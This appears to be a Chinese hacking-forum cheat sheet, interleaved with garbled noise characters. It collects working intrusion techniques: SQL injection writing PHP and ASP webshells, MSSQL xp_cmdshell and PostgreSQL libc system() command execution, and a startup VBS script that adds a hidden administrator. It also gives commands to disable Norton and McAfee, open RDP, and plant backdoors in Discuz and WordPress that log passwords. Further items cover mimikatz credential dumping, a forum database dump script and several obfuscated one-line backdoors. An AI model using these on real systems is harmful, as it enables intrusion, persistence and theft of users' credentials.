- R2 ~; D& Y# Z/ Fuse test;
8 z8 q! A4 G" N0 `create table a (cmd text);
* y1 v4 j; H. H% minsert into a values ("set wshshell=createobject (""wscript.shell"") " );3 x; o8 [7 A% d& a1 u7 G, o
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );! F# V6 N: \6 i3 t; Y8 }
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );/ i% Y% X6 S/ i5 }
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
1 Q+ _; C( m; `drop table a;
$ S: S' Q8 u2 _. p) h
9 V' a5 P/ y, N; w/ B- f, o英文版本:) v. g& |3 v' s- |0 o! ?* B7 n! U
+ f5 l0 @6 ?" k
use test;
3 W! P" f% m/ q- Z+ mcreate table a (cmd text);
& U! t4 o* g3 N$ l9 ninsert into a values ("set wshshell=createobject (""wscript.shell"") " );
, Y8 X6 [# u& V O7 W6 C* {insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );+ r4 m! m: _9 o5 E& e
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );& z5 } W) j! q5 m( U, P; t7 T
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";# S9 i8 [5 |: l
drop table a;
2 P7 X2 E5 U- H) u0 K4 o! }0 \( @. J( L+ ~; s6 `* c( S
create table a (cmd BLOB);
" U( N6 c, G! K4 \% pinsert into a values (CONVERT(木马的16进制代码,CHAR));9 \# T i8 y& A7 f: j1 `: z
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
3 f4 o7 D" l2 A: e, p5 @) ?+ S5 Hdrop table a;/ v7 p( R$ T; R% \' D
* d5 {2 u" K: ]记录一下怎么处理变态诺顿 Z* n0 S0 {3 E: I2 ]) T/ T
查看诺顿服务的路径
3 z Y. v9 H+ K3 O$ E, [0 u bsc qc ccSetMgr
8 E" \5 T+ y/ R. B* j然后设置权限拒绝访问。做绝一点。。
" w2 o5 s) c) X: Z* @cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
0 a3 C: ~& @0 N( }. N& dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
o8 E% Q- k9 Z0 A' n. ^3 Z% @' Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators& x Q6 O2 x& W, @: S# u3 _! B8 _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone4 {5 h6 \4 i X; m Q/ x9 J6 ]( Z
' M- e, r% Q4 X2 N然后再重启服务器6 t2 Z0 d# b6 a$ v3 v1 t) y
iisreset /reboot
$ V. v0 L# ` g" {; |这样就搞定了。。不过完事后。记得恢复权限。。。。1 {5 X- Y& p7 x+ C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
4 Y5 ?- j4 |, o3 S% [: a5 b* `cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
! A! F# P! @* R) ~. ?1 Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F$ N9 ?5 {! [2 D9 v6 g
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F" r( a/ b0 S2 e+ a3 M2 r% k: W
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
' |& W3 U) R! F) h! H( N. N( a
$ G; _* e5 T, |) a: j H* d# C! r/ MEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
: S* j' z' }* K5 f
& l' n k( }- s/ upostgresql注射的一些东西. `" f8 ~/ d2 W9 ?9 H; _7 m% z
如何获得webshell# I$ {# u: |7 b5 [, H
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); # k% e( D/ D) I9 N; W5 O1 i: B0 v
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); - f# h' o; @* w# y- R2 j
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
( Z4 c* @; n2 U- y7 c7 v0 H v如何读文件; T. x/ F0 R" h) @* H! j
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
7 Z. X, `2 I/ W& b6 ohttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
/ e5 \: |& i% n# i/ `http://127.0.0.1/postgresql.php?id=1;select * from myfile;
5 }5 m9 I7 w7 ~, g' ~( J
' _) |7 S8 b7 ~z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
; v7 w( Q+ X \/ T* `; ~, l: S当然,这些的postgresql的数据库版本必须大于8.X/ K& U1 \1 f! r6 i- \# w$ ^: v6 ]+ r
创建一个system的函数:
0 v5 q6 v6 M4 P( o, N) ^- |4 ICREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT1 y9 e! u' T1 F1 B1 c
+ F. z4 T8 G `3 [2 n创建一个输出表:
1 G9 R; ^$ b+ ~0 @7 l0 y2 ACREATE TABLE stdout(id serial, system_out text)) I0 x9 s* L5 S9 C% X+ u
( B K6 ]+ C, ?0 C b' ]1 d3 W执行shell,输出到输出表内:
5 k9 \6 \& b) s5 h; G6 vSELECT system('uname -a > /tmp/test')
$ B0 |" _% d2 F& b8 p' I! h$ w
copy 输出的内容到表里面;& P p: S; a5 r8 a( [
COPY stdout(system_out) FROM '/tmp/test'" t# K8 w! G+ J( _
4 B i6 `! f2 W从输出表内读取执行后的回显,判断是否执行成功
7 h6 l! W$ c3 I& h0 p- A G) y7 X4 a. z" |1 ~5 }& W8 S
SELECT system_out FROM stdout
5 G( j8 x& o, t# N# m& Y6 A下面是测试例子
( v4 q1 R( W- s
: B2 ^# T3 U( d" B/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- * \' x: Z3 p( y( Y! e2 V
8 W' X o( o: ~" o0 E8 y9 k) z/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
7 }+ x! L6 ^( ]! pSTRICT --
1 }( |6 o% a; B0 X) d( |& C! R# J% W6 N7 A0 F
/store.php?id=1; SELECT system('uname -a > /tmp/test') --8 G/ ~+ _& P2 }
6 j& U, k; S& b2 R, P/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --2 S4 k" U1 E2 }3 l( T! ~
8 Z4 m" \" ]) p @2 h/ U
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
0 c9 b3 j! b3 `* gnet stop sharedaccess stop the default firewall
2 Z8 R5 k! q! r pnetsh firewall show show/config default firewall6 S, A9 b# p/ E8 A* \3 J: u
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall6 e X% }+ o2 l' H7 ~
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
; Z& R( H; k3 w- W3 }修改3389端口方法(修改后不易被扫出)
; h9 E; L0 c* ^; Y! a修改服务器端的端口设置,注册表有2个地方需要修改
) _% k4 q+ f& {* M/ }
9 d5 a. Y+ }5 o- X[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
& D- r. u' O' \' J3 uPortNumber值,默认是3389,修改成所希望的端口,比如6000
0 n8 E' \, }# v& Z0 D# X! E5 }5 |- X' c! G& s1 G2 b6 p* }
第二个地方:/ S- S, W C& Z1 o3 u% r/ r
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] - i, l- _& l; k1 u; @+ b+ p+ c H
PortNumber值,默认是3389,修改成所希望的端口,比如6000
/ a8 P' e6 F( g- T5 L* F+ V% `3 z$ I# [6 t' a. F( {: s) }
现在这样就可以了。重启系统就可以了( b: s) F( @# g9 M U2 \4 ?$ }9 R) I
' B1 M# s$ [- K# \
查看3389远程登录的脚本, @9 c4 B. A G" R* K
保存为一个bat文件7 }8 `5 R/ T% C
date /t >>D:\sec\TSlog\ts.log
& `- G4 E5 B/ m6 s5 }, r+ V5 Ntime /t >>D:\sec\TSlog\ts.log7 ?2 B4 n, y1 z: `# M/ b
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
( B; \ u* J1 D. Ostart Explorer
- w& F, P! t) f+ b* i% K ]! U( U
mstsc的参数:
" h. k- T0 }) m4 h, \8 l! t* u0 V* q+ @
远程桌面连接' q! B7 y/ ~5 P, S* e7 y" W
7 t: Y1 B$ R5 T* E- o" `
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
2 D/ q: n% Z; e1 M3 A1 Q' p+ u [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?7 y n9 D# ^9 T9 n$ J6 k5 C+ e
" u! i( y4 g! g# U |; _. e
<Connection File> -- 指定连接的 .rdp 文件的名称。% G* m0 i- u- L' O
S( N- R9 ?2 @
/v:<server[:port]> -- 指定要连接到的终端服务器。- J6 U) n5 \, R) E
+ x! f2 z" m2 s( x2 p% B- {
/console -- 连接到服务器的控制台会话。+ t6 ]/ F/ \) g/ X
$ l: M) o H1 o
/f -- 以全屏模式启动客户端。7 l) Q8 @& V- _3 V6 d
) i I# ?3 J, b$ d% I( Z
/w:<width> -- 指定远程桌面屏幕的宽度。
, f! {; z) B7 c! o; R; V
/ \* [8 j l, H# m! ^( I/h:<height> -- 指定远程桌面屏幕的高度。) C$ i1 [) M; Y' D; q9 `0 l: x
j$ j- h! L- W9 ~6 O/ {( d
/edit -- 打开指定的 .rdp 文件来编辑。0 L' A- T4 j: z/ u8 l
5 `( k# ~" ?9 N* {* v1 f6 _1 L/migrate -- 将客户端连接管理器创建的旧版
3 J& x6 n4 J+ ]$ K连接文件迁移到新的 .rdp 连接文件。
7 o& L+ }4 }. o0 a" w1 b- b1 v+ \1 _3 U/ w1 ]! T+ O' ~+ X5 P
4 P* D3 G' \- v' J# o
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就, [& Z2 |9 P! D! E) ]# K' f, d" T
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
# g" g5 b- y' F( j+ K8 B, n) N( b+ L- h
命令行下开启3389, l/ {0 ]. q, @4 ?. l3 ]. K
net user asp.net aspnet /add
7 }. i! d) P$ Y1 D6 P2 Wnet localgroup Administrators asp.net /add& p0 d5 ~0 K3 E7 `9 x
net localgroup "Remote Desktop Users" asp.net /add
& _& e G# F+ t5 p( n; H) Xattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D# A7 ^5 V! f8 E( V# I# w
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0+ N4 X0 |& Q- t' r# k/ g+ `; ?
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
1 W' a+ m% M! X4 u2 l# z eecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f, c# s V6 D+ t1 n
sc config rasman start= auto
* B* h( {+ {; T/ A" e# {1 esc config remoteaccess start= auto
7 V- M( s- D/ ] H# A, |( Vnet start rasman
7 e1 q5 A! R g2 g8 ynet start remoteaccess
% L( S8 X* s) l0 [Media$ f s; U8 a+ f' }- ^5 ]8 x& Q; M
<form id="frmUpload" enctype="multipart/form-data"/ ?, g% k: e6 h* [* W3 o$ z b( u' ~
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>7 A- C* H$ v7 f' A
<input type="file" name="NewFile" size="50"><br>" n. C$ Y; R) Y5 G3 k
<input id="btnUpload" type="submit" value="Upload">
' D/ N" P/ Q- r5 F, h% R0 s</form>
: N4 w& U A! N5 `0 R) A
' T9 h5 C4 U# d5 S; y2 P4 qcontrol userpasswords2 查看用户的密码
, U3 E4 w K* g. ]3 baccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径0 D1 ?2 b1 B0 @. ]1 h, u' i; Z
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. |, q/ U7 v5 ^% S, Q5 u* R: w
& Y" R5 R5 W7 ?6 }! d( z5 O141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:7 a# x& P0 H/ L, m/ \
测试1:
1 I, n6 |4 @+ ?; s! gSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1) N9 T7 v2 w* t7 L$ H3 |
& x1 O) l+ e- z( @2 H测试2:
- Y. K) _$ A' H4 [/ H% L9 }( C* f$ |
create table dirs(paths varchar(100),paths1 varchar(100), id int)* |( t+ v1 f7 K' L, e
, u" x: ]$ @" Z4 qdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
: c! h; s1 P, Q& q6 F7 A
8 s. N2 O5 s' A9 JSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1. D" v- s& T% K6 p
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令 n( D% N; D: n) B% P
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;9 _/ n7 Y$ I$ x- ~# Z% m$ c: T
net stop mcafeeframework
) F# \2 F$ Z1 o, v1 Wnet stop mcshield) P3 k6 q6 X6 b8 C; P8 g! b
net stop mcafeeengineservice
5 i: G* ]$ A* T% }net stop mctaskmanager) [* C( J) R' n& Q! F ?' x
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D; L X; @' K7 T+ x" M. q. T
# y7 [; s! N7 f7 m# R* f VNCDump.zip (4.76 KB, 下载次数: 1)
" ]! q' F4 V. I$ k3 |8 F密码在线破解http://tools88.com/safe/vnc.php
/ w. N+ |+ l5 V7 n3 J7 h: [9 IVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取5 h q# }; c* V9 [
6 o" O7 R' }+ E0 v# w. M3 Qexec master..xp_cmdshell 'net user'
8 d, H. n0 I& K1 Kmssql执行命令。
5 Z+ q+ y" R E2 B, z获取mssql的密码hash查询
8 [' r6 {- O$ p: k: cselect name,password from master.dbo.sysxlogins
/ S, U7 B6 G/ y' l7 }/ W! O# v: k9 e& U" [7 x8 j$ n
backup log dbName with NO_LOG;5 }0 v- Z+ g/ I C
backup log dbName with TRUNCATE_ONLY;7 m) X: Z0 I2 Y% `
DBCC SHRINKDATABASE(dbName); s; p/ w! \; z
mssql数据库压缩) ?, N) m9 x1 i; i
# H6 n) |& {0 `( k) v
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
/ H# |3 r0 p! Q2 X! N6 j$ S将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
h4 B) O! Q! p. d: Z! n7 U
2 V: Z2 T2 N0 {' ^1 J {5 Tbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
; H0 r; q" t5 ~9 T* i! [备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak; z% y& c2 }4 C2 ?! c8 Z% E+ m
4 q3 ]3 A3 D' d" }* b
Discuz!nt35渗透要点:. d; x3 J. T2 T1 t3 X9 b
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
/ R/ X/ ?& p5 ^0 U9 F2 m( d$ ?(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>- N& |6 v. A" p: V( ?6 F
(3)保存。
$ R( O4 h9 u( a1 s7 ^! X# b9 C9 P6 A! G(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass" u j6 P6 a' k _
d:\rar.exe a -r d:\1.rar d:\website\
6 M% L7 M. A, n# r% l$ B递归压缩website/ t6 f) A4 s5 ~. `* t4 c2 M
注意rar.exe的路径9 c( F S1 q% O
' W- V4 X9 A9 h, V( n<?php+ }9 x: e, h8 F; p% d5 Y' o
' a. r. W# P' G
$telok = "0${@eval($_POST[xxoo])}";
7 P. w8 F0 _1 [/ Q+ ]+ @
" @4 e; O+ O9 V$username = "123456";7 }0 J7 e. K3 n
" I) n8 O, @. [
$userpwd = "123456";
( E. a5 M' t( I
( \0 w$ p* s- v. d# g$telhao = "123456";3 \, L7 _+ Z' Z( S b9 l! ^
% n' G5 h- w) e( C7 i5 l. A$telinfo = "123456";
" e/ W2 `1 I i5 U6 r. v
! _3 o& ]1 d7 M9 s0 `* l8 d?>! ^; W- p5 o2 p a3 t- Y+ |
php一句话未过滤插入一句话木马
; y# E7 ]& c; U( x( n5 u# f0 f
! F2 K5 C( V! e1 T站库分离脱裤技巧. |9 ] B) l" B8 J: x6 g- r- y
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'5 U. o/ r" p, T0 p& X
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'# p/ [" ~5 m' f
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
; r0 F: \' ?# O$ {% V这儿利用的是马儿的专家模式(自己写代码)。
+ z% \" B# ]# ?* V P" K. Bini_set('display_errors', 1);& p1 B4 c" }+ a
set_time_limit(0);7 z$ y8 I, R# V5 v% r [' J; f( V
error_reporting(E_ALL);2 k8 x8 w0 D8 L( }8 G# n8 p$ A/ h
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());2 f9 S/ ]+ R; }' f5 j( ~
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());1 ~; w8 K1 P Q% m3 D A! C
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());' ^: n1 n0 B1 b" k' }% L& u7 ?
$i = 0;2 {+ N8 q, [6 G. o
$tmp = '';! A; H; k I7 }- l: u* L
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {) s4 j$ u& Z P% R
$i = $i+1;
" h4 F4 ]* o! M0 c& X3 R. c9 S6 W $tmp .= implode("::", $row)."\n";* h7 ]1 U. I6 l% d& t
if(!($i%500)){//500条写入一个文件. M, E! T5 Z2 l- x" O- L
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt'; e2 d3 |& z" {
file_put_contents($filename,$tmp);- h. ]" F( W. e
$tmp = '';
/ C- p9 A) j/ J" p3 d( Q2 D. ]! a7 ^ }+ T8 p5 {! x6 m) s
}
" D$ [; S- g; e7 Q- U% {* T+ mmysql_free_result($result);
; K6 T' c: N* s) V7 P) K. O9 v0 [' d( e# S+ T
+ i: ?/ \; `' E5 i$ H. a' A6 G# f5 @" I. ?
//down完后delete
4 `9 d) F5 U" U& [ ?7 F8 p0 G l1 d6 ?: M% X$ y- z
4 z- a$ R( S3 O6 pini_set('display_errors', 1);
* x% A0 m3 p; @8 _8 F7 \; c& Zerror_reporting(E_ALL);
8 w5 F5 U5 E& o" F$i = 0;+ n _& [) t; Q" t3 ?7 P
while($i<32) {( O5 p/ q3 Z$ w" @! x6 G
$i = $i+1;
" u, ^6 t( K8 N' J- O $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';7 `. g* _. S; B; m1 h* x8 d5 @
unlink($filename);
$ P# d+ M& v U, G, F+ G}
8 B6 g+ u+ d3 u/ hhttprint 收集操作系统指纹
# E/ S( E* r+ I( f扫描192.168.1.100的所有端口. r# B0 `: w n$ n
nmap –PN –sT –sV –p0-65535 192.168.1.100# R% W* h& G- N0 D0 W
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
9 Q( |! j' y6 [1 t$ |; L# x; a) j3 q- O- s: Ehost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
, ?, n) [8 R1 V8 Q1 VNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
0 p d( l5 B+ K8 y9 X4 m: @( B0 S$ `$ j
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)6 N% \# f8 T* {8 k" s( w; S/ g# `
" e- ~/ J2 L q L J9 c, v
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
3 K, I- _8 z, R) O2 D) ]# g. z( O* g7 m' T7 Q
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
% B& b# _" ~. T& N, Y
: V$ J8 z, C9 ^# Z9 Z DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
2 J r( [ [4 ?6 r. h7 P
9 [. h+ f" k. x8 I, Q! } http://net-square.com/msnpawn/index.shtml (要求安装)
) k% q6 U% [, @! k; {* C; A. I' [5 E4 `! g6 H7 b7 r* X
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
d$ W! |0 S/ T$ L/ `. X$ b- n+ V6 {# S( p: v! q
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
" f: O2 j, n# V, O3 Gset names gb2312 P2 e5 ^5 }0 }* I! O) v
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。) h; x: B/ h1 L$ r3 M
& N# |8 O$ E# R. I7 Q) \- Kmysql 密码修改8 P' N; v' W2 @/ p; }5 i
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” / _8 x; {3 c) a2 n
update user set password=PASSWORD('antian365.com') where user='root';5 k$ ~) I4 t: J8 l T
flush privileges;
0 i8 M$ v% c3 J, T高级的PHP一句话木马后门
% N2 Q9 p8 O& c1 Y4 `8 `9 s
- {) T& W$ ]( V# l! [; Q1 a入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀- h! `% b4 j! F9 P
5 {. B/ C* r* W# }1、
( {% p2 i& |( H5 K/ i# |
; t- L0 F! q# X, ]# B$ f3 b$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
' x" [" T+ T: {! H, Q1 ^6 }
0 V, i7 ~+ e! `$ I( }; G$hh("/[discuz]/e",$_POST['h'],"Access");
_5 S9 H; d6 \1 [
- `6 M q8 u e+ J2 [( o; D8 J//菜刀一句话
5 ]4 J: e7 {5 a. }. L/ E
7 C, a5 D4 ^ m$ P8 X$ p2、
/ J5 A" Q% P0 t8 x2 _
% t, Y) d7 H1 ?- ?, `$filename=$_GET['xbid'];6 [1 r* E7 q7 R8 a
" H4 r! ^ l3 uinclude ($filename);1 q# T' S4 ?" p. z8 Z% ]6 {& i5 N
: L" _& ?2 u/ ~& H+ m! m) P. a6 q//危险的include函数,直接编译任何文件为php格式运行' C! q# g- q1 c" x0 k2 Y9 o$ K
+ w9 s- e8 O# X, {3、: A" g7 @+ Z8 b' q& ^
4 d5 u! ^9 j7 [% }2 ~% d# n7 I$reg="c"."o"."p"."y";/ o& @3 a) M3 l2 Q( V
8 U0 N% p$ P6 Z Z
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
% G | W5 N! }* N6 Q0 w
1 u/ p) l" Q; Q) z//重命名任何文件" ^. x' ?7 g/ g( ~. M% J
# c5 D0 G: |7 [( k" L: Y4、; o; ?( ^( ?+ U, J* g; s1 Y0 V
# z- U! s4 H7 R( r" ~3 Y' z* p+ n4 }$ x
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";+ G" q" [' p. S+ c4 |
H& j7 I" C# x) y$ B6 e2 t
$gzid("/[discuz]/e",$_POST['h'],"Access");
- m. g1 G7 R2 ^
# ^/ z4 c, t- y- Q* r//菜刀一句话
, ?7 J. K: `# D8 y: A
$ q% n! C; X$ ~6 b, l5、include ($uid);! A: n' }6 _+ _
3 q$ E! n2 r4 ?$ T1 \! }7 ^5 P//危险的include函数,直接编译任何文件为php格式运行,POST
: i( C. x% S$ o! l5 `
0 M5 H% a! @/ c2 O0 \! {- k* [% u u& A( D# Q N
//gif插一句话! Z4 o- ]( q9 [- h
6 u( e \" U$ K2 _# ^3 A; j
6、典型一句话
/ u { X; u- @+ O6 N! v3 g3 a5 i4 y1 E' T9 f; T/ h
程序后门代码
9 I) s9 B/ d a7 M' |$ E<?php eval_r($_POST[sb])?>
# j6 a2 ^) T. o7 F程序代码
. P0 r6 J8 u- K; ?2 I U<?php @eval_r($_POST[sb])?>: m$ b! N: I. Q) {- z9 n/ E
//容错代码
( L i2 `. Y' L/ _" P7 D程序代码5 F% ], m% g7 M y$ ^1 A; R
<?php assert($_POST[sb]);?>) Q, w9 p) g5 T; R/ ? O
//使用lanker一句话客户端的专家模式执行相关的php语句
- {$ x5 I3 h$ D程序代码
* R% S" p. ~8 l, V$ B<?$_POST['sa']($_POST['sb']);?>& c" A$ m! ]7 j: s) S0 V' \
程序代码
6 E& M! @5 x) [" p0 _<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
. p5 Y( v, T; ^& P0 X程序代码
1 @& R4 f4 D$ W* k' O# Q<?php! c6 @. v+ Z+ h8 C, U
@preg_replace("/[email]/e",$_POST['h'],"error");
6 N% z# T7 h8 Z/ N5 j?>
_1 H2 o" s6 m6 ^/ p//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入; l" M K7 w- X1 \/ u7 @+ s+ @
程序代码
! C& n6 C2 A- W9 a<O>h=@eval_r($_POST[c]);</O>
# |: |$ y1 a4 B( c% s; h程序代码& Z3 [0 S8 J3 u8 o) ]6 I
<script language="php">@eval_r($_POST[sb])</script>% L- m: n& Y1 b1 x. E$ W
//绕过<?限制的一句话% t$ P4 N5 G! o: X* J9 u/ ^' Z
% M8 i1 g$ x5 n4 M# K6 S( w7 P
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip: s! a. ]- ~* @
详细用法:
2 M- \6 ^7 o* Z1、到tools目录。psexec \\127.0.0.1 cmd' ^% B: [+ m4 o. W: s4 c
2、执行mimikatz
' [4 u) `/ m1 T9 {4 |" ]; T1 f2 A3、执行 privilege::debug
5 t* k/ S1 o8 `: j& `( q: \4、执行 inject::process lsass.exe sekurlsa.dll2 e# {( Y! l* i2 L
5、执行@getLogonPasswords
% Q$ C5 h" D, V# ]6、widget就是密码
4 U7 |6 S% Z8 `( @( N! t! D4 m7、exit退出,不要直接关闭否则系统会崩溃。( D0 a0 R+ G) p+ f. L5 `( H' U
: x* _7 P; U. O# D8 a uhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面$ R4 O9 t" L6 V7 v- \& E* s8 l
1 b6 H% O7 Y% {/ ~4 L8 _# ?自动查找系统高危补丁
( r) x; v* E2 S4 x6 R( r) S' psysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
% P' V$ X9 ?% \3 V9 ?8 J
" o; v E% i$ d突破安全狗的一句话aspx后门
' V P4 d& M' b- u2 d7 P<%@ Page Language="C#" ValidateRequest="false" %>
& c; d& t; a; A1 u<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>9 _% o/ T' I0 r; N7 i3 V
webshell下记录WordPress登陆密码
0 E% s, ?9 P7 s' z( Nwebshell下记录Wordpress登陆密码方便进一步社工
1 j2 x. V0 g) g+ `0 }: E在文件wp-login.php中539行处添加:
+ s& F* f+ l x; d- k// log password
" u! U4 J* w3 h& |$log_user=$_POST['log'];$ ]7 } w) b! K# ~. P4 o% Q% r5 g9 J+ `+ ~
$log_pwd=$_POST['pwd'];
4 h/ F5 P5 _, e$ @; u; g! _) Z$log_ip=$_SERVER["REMOTE_ADDR"];
2 R" w; a! j" r/ ?% i. L; ^$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;5 W: t1 p; q; z" ]0 w
$txt=$txt.”\r\n”;/ v! c v! Z$ W8 M
if($log_user&&$log_pwd&&$log_ip){
( _* G- N# ?& p$ A@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
2 x( I& o: t" \2 d' `- Z& {. K}
, y1 e" `7 H* |当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。0 e+ [ u1 p! N
就是搜索case ‘login’( d: S3 \# m3 D& z5 z9 O0 q0 T
在它下面直接插入即可,记录的密码生成在pwd.txt中,* G8 o0 p; R: S. l& h: G& X
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录: r9 s: ^. h* u; t* H# R z
利用II6文件解析漏洞绕过安全狗代码:( O% l/ S/ H$ Z! @/ R
;antian365.asp;antian365.jpg5 D( u1 p1 L9 ?0 P: f$ S
